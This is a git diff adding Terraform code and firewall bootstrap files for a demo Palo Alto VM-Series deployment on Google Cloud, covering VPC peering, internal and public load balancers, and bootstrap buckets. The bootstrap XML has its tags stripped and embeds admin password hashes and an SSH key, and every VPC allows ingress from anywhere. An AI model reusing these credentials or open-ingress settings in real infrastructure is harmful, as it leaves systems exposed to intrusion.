+ + 10.10.2.2 + + spoke2-vpc + + + + 10.10.1.2 + + spoke1-vpc + + + + 10.10.1.0/24 + + spoke1-vpc + + + + 10.10.2.0/24 + + spoke2-vpc + + + + 192.168.1.2 + + + 192.168.1.3 + + + 10.10.1.100 + + spoke1-vpc + + + + 10.10.1.3 + + spoke1-vpc + + +
+ + + + ethernet1/1 + ethernet1/2 + + + + + + color3 + + + color24 + + + color20 + + + color13 + + + +
+
+
+
+
diff --git a/gcp/adv-peering-with-lbnh/bootstrap_files/init-cfg.txt b/gcp/adv-peering-with-lbnh/bootstrap_files/init-cfg.txt new file mode 100644 index 00000000..8d3c0290 --- /dev/null +++ b/gcp/adv-peering-with-lbnh/bootstrap_files/init-cfg.txt @@ -0,0 +1,10 @@ +type=dhcp-client +ip-address= +default-gateway= +netmask= +ipv6-address= +ipv6-default-gateway= +dhcp-accept-server-hostname=yes +dns-primary=8.8.8.8 +dns-secondary=4.2.2.2 +op-command-modes=mgmt-interface-swap \ No newline at end of file diff --git a/gcp/adv-peering-with-lbnh/bootstrap_files_ilbnh/authcodes b/gcp/adv-peering-with-lbnh/bootstrap_files_ilbnh/authcodes new file mode 100644 index 00000000..0519ecba --- /dev/null +++ b/gcp/adv-peering-with-lbnh/bootstrap_files_ilbnh/authcodes @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/gcp/adv-peering-with-lbnh/bootstrap_files_ilbnh/bootstrap.xml b/gcp/adv-peering-with-lbnh/bootstrap_files_ilbnh/bootstrap.xml new file mode 100644 index 00000000..7e2a3a37 --- /dev/null +++ b/gcp/adv-peering-with-lbnh/bootstrap_files_ilbnh/bootstrap.xml @@ -0,0 +1,890 @@ + + + + + + $1$eyegmtyu$VFbNwpbaZ8sUG40wpdo/A/ + + + yes + + + c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFERmRyZmRqUUFSL2NnelVSRTYwLzFKbHFoWXEra3FIeGNxMlpOTTR5VkRobVZ3K2dnUXBxTWQwdG8yRmRZeXV4bUhHdVF4bGFMQkp4UDBtcW5LU3A2eUhqZ2orMTRHK29oYVpKbW5Bd3A2YXVkbXVHVkVEMnliVmZvcGc2dlh3WVdIaFdsSlk3N25ESStxQ1U1blRlMjlZNlpvU29PYmJZWkFqZjY5TXRBUzF2blEwZHduUzk2MEo4ZGdoWjMxK2Z5bTFWdDB5WFlmZ0JPYU4yK0JiK0dRa1dreEQ3UHErUEVYd3EvdysyajZ3d3ZmbEVGQVVkNXNMejh2TzBVMDBEYVZiVFVvMkFoR1VRZndlNVJsTDNTQzdzaTRQdDdYMWVsK2swTW54ZzMyUkt6UFM0ZHd6emYxRklJR2VhYVNnbVFNMGRuQ0hxYjNnMzdzWWpybWFVSGogcGdseW5u + + + + + yes + + + $1$xxqwnwvr$El9XN5KexgoltjkVjbkcd0 + + + + + + + + + + + + + yes + 5 + + + yes + 5 + + + yes + 5 + + + yes + 10 + + + yes + 5 + + + + yes + + + + 10 + 10 + + 100 + 50 + + + + 10 + 10 + + 100 + 50 + + + + + + 100 + yes + + + + + + + + + + + + + + + + + + + + + no + + + + + no + + + no + + + no + + + + + + + + + no + + + + + no + + + no + + + + + + + + + + no + + + + + health-check + + + + + + + + 3 + 5 + wait-recover + + + + + no + yes + + + + + + + + + aes-128-cbc + 3des + + + sha1 + + + group2 + + + 8 + + + + + aes-128-cbc + + + sha256 + + + group19 + + + 8 + + + + + aes-256-cbc + + + sha384 + + + group20 + + + 8 + + + + + + + + aes-128-cbc + 3des + + + sha1 + + + group2 + + 1 + + + + + + aes-128-gcm + + + none + + + group19 + + 1 + + + + + + aes-256-gcm + + + none + + + group20 + + 1 + + + + + + + aes-128-cbc + + + sha1 + + + + + + + + + + + real-time + + + high + + + high + + + medium + + + medium + + + low + + + low + + + low + + + + + + + + + + no + + + 1.25 + 0.5 + 900 + 300 + 900 + yes + + + + + yes + + + + + no + + + no + + + no + + + + ethernet1/1 + ethernet1/2 + loopback.1 + + + + + + + + + + + + no + any + 2 + + + 192.168.12.1 + + + None + + ethernet1/1 + 10 + 35.191.0.0/16 + + + + + + + no + any + 2 + + + 192.168.12.1 + + + None + + ethernet1/1 + 10 + 130.211.0.0/22 + + + + + + + no + any + 2 + + + 192.168.12.1 + + + None + + ethernet1/1 + 10 + 10.10.1.0/24 + + + + + + + no + any + 2 + + + 192.168.12.1 + + + None + + ethernet1/1 + 10 + 10.10.2.0/24 + + + + + + + + + + + + + + + yes + no + yes + no + + + updates.paloaltonetworks.com + + + + + wednesday + 01:02 + download-only + + + + + US/Pacific + + yes + yes + + PA-VM + + + + yes + + + FQDN + + + + yes + no + yes + no + + + 8.8.8.8 + 4.2.2.2 + mgmt-interface-swap + + + + + + + + + + + + + ethernet1/1 + loopback.1 + + + + + + + ethernet1/2 + + + + + + + + + + + + + untrust + + + trust + + + any + + + any + + + any + + + any + + + any + + + any + + + any + + allow + + + + trust + + + trust + + + 35.191.0.0/16 + 130.211.0.0/22 + + + any + + + any + + + any + + + any + + + any + + + any + + allow + universal + + + + trust + + + trust + + + any + + + any + + + any + + + any + + + any + + + any + + + any + + allow + intrazone + + + + strict file blocking + + + default + + + strict + + + strict-1 + + + default + + + + + + + + + + drop + no + yes + + + deny + no + yes + + + + + + + + + + ethernet1/2 + + + + + untrust + + + trust + + + any + + + any + + any + + + + trust + + + trust + + + 35.191.0.0/16 + 130.211.0.0/22 + + + any + + any + ethernet1/1 + + 100.64.0.1 + + + + + + + ethernet1/1 + + + + + trust + + + trust + + + any + + + any + + any + ethernet1/1 + + + + + + + + ethernet1/1 + ethernet1/2 + loopback.1 + + + + + + + + + client + any + any + + critical + + + any + + + any + + + + + + + client + any + any + + high + + + any + + + any + + + + + + + client + any + any + + medium + + + any + + + any + + + + + + + client + any + any + + informational + + + any + + + any + + + + + + + client + any + any + + low + + + any + + + any + + + + + + + server + any + any + + critical + + + any + + + any + + + + + + + server + any + any + + high + + + any + + + any + + + + + + + server + any + any + + medium + + + any + + + any + + + + + + + server + any + any + + informational + + + any + + + any + + + + + + + server + any + any + + low + + + any + + + any + + + + + + + + + + + + + + diff --git a/gcp/adv-peering-with-lbnh/bootstrap_files_ilbnh/init-cfg.txt b/gcp/adv-peering-with-lbnh/bootstrap_files_ilbnh/init-cfg.txt new file mode 100644 index 00000000..8d3c0290 --- /dev/null +++ b/gcp/adv-peering-with-lbnh/bootstrap_files_ilbnh/init-cfg.txt @@ -0,0 +1,10 @@ +type=dhcp-client +ip-address= +default-gateway= +netmask= +ipv6-address= +ipv6-default-gateway= +dhcp-accept-server-hostname=yes +dns-primary=8.8.8.8 +dns-secondary=4.2.2.2 +op-command-modes=mgmt-interface-swap \ No newline at end of file diff --git a/gcp/adv-peering-with-lbnh/deleteme b/gcp/adv-peering-with-lbnh/deleteme new file mode 100644 index 00000000..8b137891 --- /dev/null +++ b/gcp/adv-peering-with-lbnh/deleteme @@ -0,0 +1 @@ + diff --git a/gcp/adv-peering-with-lbnh/guide.pdf b/gcp/adv-peering-with-lbnh/guide.pdf new file mode 100644 index 00000000..bac56ad0 Binary files /dev/null and b/gcp/adv-peering-with-lbnh/guide.pdf differ diff --git a/gcp/adv-peering-with-lbnh/ilbnh.tf b/gcp/adv-peering-with-lbnh/ilbnh.tf new file mode 100644 index 00000000..3c7bc041 --- /dev/null +++ b/gcp/adv-peering-with-lbnh/ilbnh.tf @@ -0,0 +1,67 @@ +provider "google-beta" { + credentials = "${var.main_project_authfile}" + project = "${var.main_project}" + region = "${var.region}" + alias = "ilbnh" +} + +#************************************************************************************ +# CREATE GCP BUCKET FOR VMSERIES BOOTSTRAP - ILBNH +#************************************************************************************ +module "bootstrap_ilbnh" { + source = "./modules/create_bootstrap_bucket_ilbnh/" + bucket_name = "vmseries-ilbnh" + randomize_bucket_name = true + file_location = "bootstrap_files_ilbnh/" + enable_ilbnh = "${var.enable_ilbnh}" + config = ["init-cfg.txt", "bootstrap.xml"] // default [] + license = ["authcodes"] // default [] + # content = ["panupv2-all-contents-8133-5346", "panup-all-antivirus-2917-3427", "panupv2-all-wildfire-331212-333889"] // default [] + # software = ["PanOS_vm-9.0.0"] // default [] +} + +#************************************************************************************ +# CREATE 2xVMSERIES FIREWALL W/ 3 NICS (MGMT VPC, UNTRUST VPC, TRUST VPC) - ILBNH +#************************************************************************************ +module "vm_fw_ilbnh" { + source = "./modules/create_vmseries_ilbnh/" + fw_names = ["vmseries03", "vmseries04"] + fw_machine_type = "n1-standard-4" + fw_zones = ["${var.region}-a", "${var.region}-b"] + fw_subnetworks = ["${module.ilb_trust.subnetwork_self_link[0]}", "${module.ilb_mgmt.subnetwork_self_link[0]}", "${module.ilb_untrust.subnetwork_self_link[0]}"] + enable_ilbnh = "${var.enable_ilbnh}" + fw_nic0_ip = ["192.168.12.4", "192.168.12.5"] // default [""] - enables dynamically assigned IP + fw_nic1_ip = ["192.168.10.4", "192.168.10.5"] + fw_nic2_ip = ["192.168.11.4", "192.168.11.5"] + + fw_bootstrap_bucket = "${module.bootstrap_ilbnh.bucket_name}" + fw_ssh_key = "admin:${var.vmseries_ssh_key}" + fw_image = "${var.vmseries_image}" + + create_instance_group = true + instance_group_names = ["vmseries03-ig", "vmseries04-ig"] // default "vmseries-instance-group" + + dependencies = [ + "${module.bootstrap_ilbnh.completion}", + ] +} + +#************************************************************************************ +# CREATE VMSERIES INTERNAL LOAD BALANCER - ILBNH +#************************************************************************************ +module "vmseries_internal_lb_ilbnh" { + source = "./modules/create_ilbnh/" + internal_lb_name_ilbnh = "ilbnh" + internal_lb_ports_ilbnh = "22" + subnetworks = ["${module.ilb_trust.subnetwork_self_link[0]}"] + internal_lbnh_ip = "192.168.12.6" + enable_ilbnh = "${var.enable_ilbnh}" + backends = [ + { + group = "${module.vm_fw_ilbnh.instance_group[0]}" + }, + { + group = "${module.vm_fw_ilbnh.instance_group[1]}" + }, + ] +} diff --git a/gcp/adv-peering-with-lbnh/ilbnh_override.tf b/gcp/adv-peering-with-lbnh/ilbnh_override.tf new file mode 100644 index 00000000..d3bb02dd --- /dev/null +++ b/gcp/adv-peering-with-lbnh/ilbnh_override.tf @@ -0,0 +1,7 @@ +#************************************************************************************ +# ILBNH +#************************************************************************************ +variable "enable_ilbnh" { + description = "If set to true, enable ILB as Next Hop" + default = true +} diff --git a/gcp/adv-peering-with-lbnh/images/Overview.png b/gcp/adv-peering-with-lbnh/images/Overview.png new file mode 100644 index 00000000..5c1924ba Binary files /dev/null and b/gcp/adv-peering-with-lbnh/images/Overview.png differ diff --git a/gcp/adv-peering-with-lbnh/images/peering.png b/gcp/adv-peering-with-lbnh/images/peering.png new file mode 100644 index 00000000..b4fcae29 Binary files /dev/null and b/gcp/adv-peering-with-lbnh/images/peering.png differ diff --git a/gcp/adv-peering-with-lbnh/images/routes.png b/gcp/adv-peering-with-lbnh/images/routes.png new file mode 100644 index 00000000..244156c9 Binary files /dev/null and b/gcp/adv-peering-with-lbnh/images/routes.png differ diff --git a/gcp/adv-peering-with-lbnh/images/web.jpg b/gcp/adv-peering-with-lbnh/images/web.jpg new file mode 100644 index 00000000..16d24561 Binary files /dev/null and b/gcp/adv-peering-with-lbnh/images/web.jpg differ diff --git a/gcp/adv-peering-with-lbnh/main.tf b/gcp/adv-peering-with-lbnh/main.tf new file mode 100644 index 00000000..9233d3e9 --- /dev/null +++ b/gcp/adv-peering-with-lbnh/main.tf @@ -0,0 +1,196 @@ +provider "google" { + credentials = "${var.main_project_authfile}" + project = "${var.main_project}" + region = "${var.region}" +} + +#************************************************************************************ +# CREATE VPCS - MGMT, UNTRUST, TRUST +#************************************************************************************ +module "vpc_mgmt" { + source = "./modules/create_vpc/" + vpc_name = "mgmt-vpc" + subnetworks = ["mgmt-subnet"] + ip_cidrs = ["192.168.0.0/24"] + regions = ["${var.region}"] + ingress_allow_all = true + ingress_sources = ["0.0.0.0/0"] +} + +module "vpc_untrust" { + source = "./modules/create_vpc/" + vpc_name = "untrust-vpc" + subnetworks = ["untrust-subnet"] + ip_cidrs = ["192.168.1.0/24"] + regions = ["${var.region}"] + ingress_allow_all = true + ingress_sources = ["0.0.0.0/0"] +} + +module "vpc_trust" { + source = "./modules/create_vpc/" + vpc_name = "trust-vpc" + subnetworks = ["trust-subnet"] + ip_cidrs = ["192.168.2.0/24"] + regions = ["${var.region}"] + ingress_allow_all = true + ingress_sources = ["0.0.0.0/0"] +} + +module "ilb_mgmt" { + source = "./modules/create_vpc/" + vpc_name = "ilb-mgmt-vpc" + subnetworks = ["ilb-mgmt-subnet"] + ip_cidrs = ["192.168.10.0/24"] + regions = ["${var.region}"] + ingress_allow_all = true + ingress_sources = ["0.0.0.0/0"] +} + +module "ilb_untrust" { + source = "./modules/create_vpc/" + vpc_name = "ilb-untrust-vpc" + subnetworks = ["ilb-untrust-subnet"] + ip_cidrs = ["192.168.11.0/24"] + regions = ["${var.region}"] + ingress_allow_all = true + ingress_sources = ["0.0.0.0/0"] +} + +module "ilb_trust" { + source = "./modules/create_vpc/" + vpc_name = "ilb-trust-vpc" + subnetworks = ["ilb-trust-subnet"] + ip_cidrs = ["192.168.12.0/24"] + regions = ["${var.region}"] + ingress_allow_all = true + ingress_sources = ["0.0.0.0/0"] +} + +#************************************************************************************ +# CREATE GCP BUCKET FOR VMSERIES BOOTSTRAP +#************************************************************************************ +module "bootstrap" { + source = "./modules/create_bootstrap_bucket/" + bucket_name = "vmseries-adv-peering" + randomize_bucket_name = true + file_location = "bootstrap_files/" + + config = ["init-cfg.txt", "bootstrap.xml"] // default [] + license = ["authcodes"] // default [] + # content = ["panupv2-all-contents-8133-5346", "panup-all-antivirus-2917-3427", "panupv2-all-wildfire-331212-333889"] // default [] + # software = ["PanOS_vm-9.0.0"] // default [] +} +#************************************************************************************ +# CREATE 2xVMSERIES FIREWALL W/ 3 NICS (MGMT VPC, UNTRUST VPC, TRUST VPC) +#************************************************************************************ +module "vm_fw" { + source = "./modules/create_vmseries/" + fw_names = ["vmseries01", "vmseries02"] + fw_machine_type = "n1-standard-4" + fw_zones = ["${var.region}-a", "${var.region}-b"] + fw_subnetworks = ["${module.vpc_untrust.subnetwork_self_link[0]}", "${module.vpc_mgmt.subnetwork_self_link[0]}", "${module.vpc_trust.subnetwork_self_link[0]}"] + + fw_nic0_ip = ["192.168.1.2", "192.168.1.3"] // default [""] - enables dynamically assigned IP + fw_nic1_ip = ["192.168.0.2", "192.168.0.3"] + fw_nic2_ip = ["192.168.2.2", "192.168.2.3"] + + fw_bootstrap_bucket = "${module.bootstrap.bucket_name}" + fw_ssh_key = "admin:${var.vmseries_ssh_key}" + fw_image = "${var.vmseries_image}" + + create_instance_group = true + instance_group_names = ["vmseries01-ig", "vmseries02-ig"] // default "vmseries-instance-group" + + dependencies = [ + "${module.bootstrap.completion}", + ] +} + +#************************************************************************************ +# CREATE VMSERIES PUBLIC HTTP LOAD BALANCER +#************************************************************************************ +module "vmseries_public_lb" { + source = "./modules/create_public_lb/" + name = "vmseries-lb" + + backends = { + "0" = [ + { + group = "${module.vm_fw.instance_group[0]}" + }, + { + group = "${module.vm_fw.instance_group[1]}" + }, + ] + } + + backend_params = [ + "/,http,80,10", // health check path, port name, port number, timeout seconds. + ] +} + +#************************************************************************************ +# CREATE DEFAULT ROUTE TO WITHIN TRUST VPC TO FW1 & FW2 +#************************************************************************************ +#resource "google_compute_route" "default" { +# count = "${length(module.vm_fw.fw_names)}" +# name = "default-to-${module.vm_fw.fw_names[count.index]}" +# dest_range = "0.0.0.0/0" +# network = "${module.vpc_trust.vpc_self_link}" +# next_hop_instance = "${module.vm_fw.fw_self_link[count.index]}" +# priority = 100 +#} + +#************************************************************************************ +# CREATE PEERING LINKS TRUST-to-SPOKE1 / TRUST-to-SPOKE2 +#************************************************************************************ +resource "google_compute_network_peering" "trust_to_spoke1" { + name = "trust-to-spoke1" + network = "${module.vpc_trust.vpc_self_link}" + peer_network = "${module.vpc_spoke1.vpc_self_link}" + + depends_on = [ + "module.vm_spoke1","module.vm_spoke2" + ] +} + +resource "google_compute_network_peering" "trust_to_spoke2" { + name = "trust-to-spoke2" + network = "${module.vpc_trust.vpc_self_link}" + peer_network = "${module.vpc_spoke2.vpc_self_link}" + + provisioner "local-exec" { + command = "sleep 45" + } + + depends_on = [ + "google_compute_network_peering.trust_to_spoke1", + ] +} +#************************************************************************************ +# CREATE PEERING LINKS ILB-TRUST-to-SPOKE1 / TRUST-to-SPOKE2 +#************************************************************************************ +resource "google_compute_network_peering" "ilb_trust_to_spoke1" { + name = "ilb-trust-to-spoke1" + network = "${module.ilb_trust.vpc_self_link}" + peer_network = "${module.vpc_spoke1.vpc_self_link}" + + depends_on = [ + "google_compute_network_peering.trust_to_spoke2", + ] +} + +resource "google_compute_network_peering" "ilb_trust_to_spoke2" { + name = "ilb-trust-to-spoke2" + network = "${module.ilb_trust.vpc_self_link}" + peer_network = "${module.vpc_spoke2.vpc_self_link}" + + provisioner "local-exec" { + command = "sleep 45" + } + + depends_on = [ + "google_compute_network_peering.ilb_trust_to_spoke1", + ] +} \ No newline at end of file diff --git a/gcp/adv-peering-with-lbnh/modules/create_bootstrap_bucket/main.tf b/gcp/adv-peering-with-lbnh/modules/create_bootstrap_bucket/main.tf new file mode 100644 index 00000000..bfe60b19 --- /dev/null +++ b/gcp/adv-peering-with-lbnh/modules/create_bootstrap_bucket/main.tf @@ -0,0 +1,120 @@ +variable bucket_name {} + +variable file_location {} + +variable config { + type = "list" + default = [] +} + +variable content { + type = "list" + default = [] +} + +variable license { + type = "list" + default = [] +} + +variable software { + default = [] +} + +variable randomize_bucket_name { + default = false +} + +locals { + bucket_name = "${var.randomize_bucket_name ? join("", list(var.bucket_name, random_string.randomstring.result)) : var.bucket_name}" +} + +resource "random_string" "randomstring" { + count = "${var.randomize_bucket_name}" + length = 25 + min_lower = 15 + min_numeric = 10 + special = false +} + +resource "google_storage_bucket" "bootstrap" { + name = "${local.bucket_name}" + force_destroy = true +} + +resource "google_storage_bucket_object" "config_full" { + count = "${length(var.config) > 0 ? length(var.config) : "0" }" + name = "config/${element(var.config, count.index)}" + source = "${var.file_location}${element(var.config, count.index)}" + bucket = "${google_storage_bucket.bootstrap.name}" +} + +resource "google_storage_bucket_object" "content_full" { + count = "${length(var.content) > 0 ? length(var.content) : "0" }" + name = "content/${element(var.content, count.index)}" + source = "${var.file_location}${element(var.content, count.index)}" + bucket = "${google_storage_bucket.bootstrap.name}" +} + +resource "google_storage_bucket_object" "license_full" { + count = "${length(var.license) > 0 ? length(var.license) : "0" }" + name = "license/${element(var.license, count.index)}" + source = "${var.file_location}${element(var.license, count.index)}" + bucket = "${google_storage_bucket.bootstrap.name}" +} +resource "google_storage_bucket_object" "software_full" { + count = "${length(var.software) > 0 ? length(var.software) : "0" }" + name = "software/${element(var.software, count.index)}" + source = "${var.file_location}${element(var.software, count.index)}" + bucket = "${google_storage_bucket.bootstrap.name}" +} +resource "google_storage_bucket_object" "config_empty" { + count = "${length(var.config) == 0 ? 1 : 0 }" + name = "config/" + content = "config/" + bucket = "${google_storage_bucket.bootstrap.name}" +} + +resource "google_storage_bucket_object" "content_empty" { + count = "${length(var.content) == 0 ? 1 : 0 }" + name = "content/" + content = "content/" + bucket = "${google_storage_bucket.bootstrap.name}" +} + +resource "google_storage_bucket_object" "license_empty" { + count = "${length(var.license) == 0 ? 1 : 0 }" + name = "license/" + content = "license/" + bucket = "${google_storage_bucket.bootstrap.name}" +} + +resource "google_storage_bucket_object" "software_empty" { + count = "${length(var.software) == 0 ? 1 : 0 }" + name = "software/" + content = "software/" + bucket = "${google_storage_bucket.bootstrap.name}" +} + + +resource "null_resource" "dependency_setter" { + depends_on = [ + "google_storage_bucket.bootstrap", + "google_storage_bucket_object.config_full", + "google_storage_bucket_object.content_full", + "google_storage_bucket_object.license_full", + "google_storage_bucket_object.software_full", + "google_storage_bucket_object.config_empty", + "google_storage_bucket_object.content_empty", + "google_storage_bucket_object.license_empty", + "google_storage_bucket_object.software_empty", + ] +} + +output "completion" { + value = "${null_resource.dependency_setter.id}" +} + +output "bucket_name" { + value = "${google_storage_bucket.bootstrap.name}" +} diff --git a/gcp/adv-peering-with-lbnh/modules/create_bootstrap_bucket_ilbnh/main.tf b/gcp/adv-peering-with-lbnh/modules/create_bootstrap_bucket_ilbnh/main.tf new file mode 100644 index 00000000..23092e2b --- /dev/null +++ b/gcp/adv-peering-with-lbnh/modules/create_bootstrap_bucket_ilbnh/main.tf @@ -0,0 +1,124 @@ +variable enable_ilbnh { + default = false +} +variable bucket_name {} + +variable file_location {} + +variable config { + type = "list" + default = [] +} + +variable content { + type = "list" + default = [] +} + +variable license { + type = "list" + default = [] +} + +variable software { + default = [] +} + +variable randomize_bucket_name { + default = false +} + +locals { + bucket_name = "${var.randomize_bucket_name ? join("", list(var.bucket_name, random_string.randomstring.result)) : var.bucket_name}" +} + +resource "random_string" "randomstring" { + count = "${var.randomize_bucket_name}" + length = 25 + min_lower = 15 + min_numeric = 10 + special = false +} + +resource "google_storage_bucket" "bootstrap" { + count = "${var.enable_ilbnh ? 1 : 0}" + name = "${local.bucket_name}" + force_destroy = true +} + +resource "google_storage_bucket_object" "config_full" { + count = "${(length(var.config) > 0 && var.enable_ilbnh) ? length(var.config) : "0" }" + name = "config/${element(var.config, count.index)}" + source = "${var.file_location}${element(var.config, count.index)}" + bucket = "${join(",",google_storage_bucket.bootstrap.*.name)}" +} + +resource "google_storage_bucket_object" "content_full" { + count = "${(length(var.content) > 0 && var.enable_ilbnh) ? length(var.content) : "0" }" + name = "content/${element(var.content, count.index)}" + source = "${var.file_location}${element(var.content, count.index)}" + bucket = "${join(",",google_storage_bucket.bootstrap.*.name)}" +} + +resource "google_storage_bucket_object" "license_full" { + count = "${(length(var.license) > 0 && var.enable_ilbnh) ? length(var.license) : "0" }" + name = "license/${element(var.license, count.index)}" + source = "${var.file_location}${element(var.license, count.index)}" + bucket = "${join(",",google_storage_bucket.bootstrap.*.name)}" +} +resource "google_storage_bucket_object" "software_full" { + count = "${(length(var.software) > 0 && var.enable_ilbnh) ? length(var.software) : "0" }" + name = "software/${element(var.software, count.index)}" + source = "${var.file_location}${element(var.software, count.index)}" + bucket = "${join(",",google_storage_bucket.bootstrap.*.name)}" +} +resource "google_storage_bucket_object" "config_empty" { + count = "${(length(var.config) == 0 && var.enable_ilbnh) ? 1 : 0 }" + name = "config/" + content = "config/" + bucket = "${join(",",google_storage_bucket.bootstrap.*.name)}" +} + +resource "google_storage_bucket_object" "content_empty" { + count = "${(length(var.content) == 0 && var.enable_ilbnh) ? 1 : 0 }" + name = "content/" + content = "content/" + bucket = "${join(",",google_storage_bucket.bootstrap.*.name)}" +} + +resource "google_storage_bucket_object" "license_empty" { + count = "${(length(var.license) == 0 && var.enable_ilbnh) ? 1 : 0 }" + name = "license/" + content = "license/" + bucket = "${join(",",google_storage_bucket.bootstrap.*.name)}" +} + +resource "google_storage_bucket_object" "software_empty" { + count = "${(length(var.software) == 0 && var.enable_ilbnh) ? 1 : 0 }" + name = "software/" + content = "software/" + bucket = "${join(",",google_storage_bucket.bootstrap.*.name)}" +} + + +resource "null_resource" "dependency_setter" { + depends_on = [ + "google_storage_bucket.bootstrap", + "google_storage_bucket_object.config_full", + "google_storage_bucket_object.content_full", + "google_storage_bucket_object.license_full", + "google_storage_bucket_object.software_full", + "google_storage_bucket_object.config_empty", + "google_storage_bucket_object.content_empty", + "google_storage_bucket_object.license_empty", + "google_storage_bucket_object.software_empty", + ] +} + +output "completion" { + value = "${null_resource.dependency_setter.id}" +} + +output "bucket_name" { + value = "${join(",",google_storage_bucket.bootstrap.*.name)}" +} diff --git a/gcp/adv-peering-with-lbnh/modules/create_ilbnh/main.tf b/gcp/adv-peering-with-lbnh/modules/create_ilbnh/main.tf new file mode 100644 index 00000000..49392b2e --- /dev/null +++ b/gcp/adv-peering-with-lbnh/modules/create_ilbnh/main.tf @@ -0,0 +1,51 @@ +variable enable_ilbnh { + default = false +} +variable "internal_lb_name_ilbnh" { + default = "ilbnh" +} +variable "internal_lb_ports_ilbnh" { + default = "22" +} +variable backends { + description = "Map backend indices to list of backend maps." + type = "list" +} +variable subnetworks { + type = "list" +} +variable "internal_lbnh_ip" { + default = "" +} +#************************************************************************************ +# CREATE VMSERIES INTERNAL LOAD BALANCER - ILBNH +#************************************************************************************ +resource "google_compute_health_check" "health_check_ilbnh" { + name = "${var.internal_lb_name_ilbnh}-check" + count = "${var.enable_ilbnh ? 1 : 0}" + + tcp_health_check { + port = "${var.internal_lb_ports_ilbnh}" + } +} + +resource "google_compute_region_backend_service" "backend_service_ilbnh" { + name = "${var.internal_lb_name_ilbnh}" + count = "${var.enable_ilbnh ? 1 : 0}" + health_checks = ["${google_compute_health_check.health_check_ilbnh.self_link}"] + backend = ["${var.backends}"] + session_affinity = "CLIENT_IP" + +} + + +resource "google_compute_forwarding_rule" "forwarding_rule_ilbnh" { + name = "${var.internal_lb_name_ilbnh}-all" + count = "${var.enable_ilbnh ? 1 : 0}" + load_balancing_scheme = "INTERNAL" + ip_address = "${var.internal_lbnh_ip}" + ip_protocol = "TCP" + all_ports = true + subnetwork = "${var.subnetworks[0]}" + backend_service = "${google_compute_region_backend_service.backend_service_ilbnh.self_link}" +} diff --git a/gcp/adv-peering-with-lbnh/modules/create_public_lb/main.tf b/gcp/adv-peering-with-lbnh/modules/create_public_lb/main.tf new file mode 100644 index 00000000..961faca1 --- /dev/null +++ b/gcp/adv-peering-with-lbnh/modules/create_public_lb/main.tf @@ -0,0 +1,168 @@ + +variable project { + description = "The project to deploy to, if not set the default provider project is used." + default = "" +} + +variable ip_version { + description = "IP version for the Global address (IPv4 or v6) - Empty defaults to IPV4" + default = "" +} + +variable name { + description = "Name for the forwarding rule and prefix for supporting resources" +} + +variable backends { + description = "Map backend indices to list of backend maps." + type = "map" +} + +variable backend_params { + description = "Comma-separated encoded list of parameters in order: health check path, service port name, service port, backend timeout seconds" + type = "list" +} + +variable backend_protocol { + description = "The protocol with which to talk to the backend service" + default = "HTTP" +} + +variable create_url_map { + description = "Set to `false` if url_map variable is provided." + default = true +} + +variable url_map { + description = "The url_map resource to use. Default is to send all traffic to first backend." + default = "" +} + +variable http_forward { + description = "Set to `false` to disable HTTP port 80 forward" + default = true +} + +variable ssl { + description = "Set to `true` to enable SSL support, requires variable `ssl_certificates` - a list of self_link certs" + default = false +} + +variable private_key { + description = "Content of the private SSL key. Required if `ssl` is `true` and `ssl_certificates` is empty." + default = "" +} + +variable certificate { + description = "Content of the SSL certificate. Required if `ssl` is `true` and `ssl_certificates` is empty." + default = "" +} + +variable use_ssl_certificates { + description = "If true, use the certificates provided by `ssl_certificates`, otherwise, create cert from `private_key` and `certificate`" + default = false +} + +variable ssl_certificates { + type = "list" + description = "SSL cert self_link list. Required if `ssl` is `true` and no `private_key` and `certificate` is provided." + default = [] +} + +variable security_policy { + description = "The resource URL for the security policy to associate with the backend service" + default = "" +} + +variable cdn { + description = "Set to `true` to enable cdn on backend." + default = "false" +} + + +resource "google_compute_global_forwarding_rule" "http" { + project = "${var.project}" + count = "${var.http_forward ? 1 : 0}" + name = "${var.name}" + target = "${google_compute_target_http_proxy.default.self_link}" + ip_address = "${google_compute_global_address.default.address}" + port_range = "80" + depends_on = ["google_compute_global_address.default"] +} + +resource "google_compute_global_forwarding_rule" "https" { + project = "${var.project}" + count = "${var.ssl ? 1 : 0}" + name = "${var.name}-https" + target = "${google_compute_target_https_proxy.default.self_link}" + ip_address = "${google_compute_global_address.default.address}" + port_range = "443" + depends_on = ["google_compute_global_address.default"] +} + +resource "google_compute_global_address" "default" { + project = "${var.project}" + name = "${var.name}-address" + ip_version = "${var.ip_version}" +} + +# HTTP proxy when ssl is false +resource "google_compute_target_http_proxy" "default" { + project = "${var.project}" + count = "${var.http_forward ? 1 : 0}" + name = "${var.name}-http-proxy" + url_map = "${element(compact(concat(list(var.url_map), google_compute_url_map.default.*.self_link)), 0)}" +} + +# HTTPS proxy when ssl is true +resource "google_compute_target_https_proxy" "default" { + project = "${var.project}" + count = "${var.ssl ? 1 : 0}" + name = "${var.name}-https-proxy" + url_map = "${element(compact(concat(list(var.url_map), google_compute_url_map.default.*.self_link)), 0)}" + ssl_certificates = ["${compact(concat(var.ssl_certificates, google_compute_ssl_certificate.default.*.self_link))}"] +} + +resource "google_compute_ssl_certificate" "default" { + project = "${var.project}" + count = "${(var.ssl && !var.use_ssl_certificates) ? 1 : 0}" + name_prefix = "${var.name}-certificate-" + private_key = "${var.private_key}" + certificate = "${var.certificate}" + + lifecycle = { + create_before_destroy = true + } +} + +resource "google_compute_url_map" "default" { + project = "${var.project}" + count = "${var.create_url_map ? 1 : 0}" + name = "${var.name}" + default_service = "${google_compute_backend_service.default.0.self_link}" +} + +resource "google_compute_backend_service" "default" { + project = "${var.project}" + count = "${length(var.backend_params)}" + name = "${var.name}-backend-${count.index}" + port_name = "${element(split(",", element(var.backend_params, count.index)), 1)}" + protocol = "${var.backend_protocol}" + timeout_sec = "${element(split(",", element(var.backend_params, count.index)), 3)}" + backend = ["${var.backends["${count.index}"]}"] + health_checks = ["${element(google_compute_http_health_check.default.*.self_link, count.index)}"] + security_policy = "${var.security_policy}" + enable_cdn = "${var.cdn}" +} + +resource "google_compute_http_health_check" "default" { + project = "${var.project}" + count = "${length(var.backend_params)}" + name = "${var.name}-check-${count.index}" + request_path = "${element(split(",", element(var.backend_params, count.index)), 0)}" + port = "${element(split(",", element(var.backend_params, count.index)), 2)}" +} + +output "address" { + value = "${google_compute_global_address.default.address}" +} \ No newline at end of file diff --git a/gcp/adv-peering-with-lbnh/modules/create_vm/main.tf 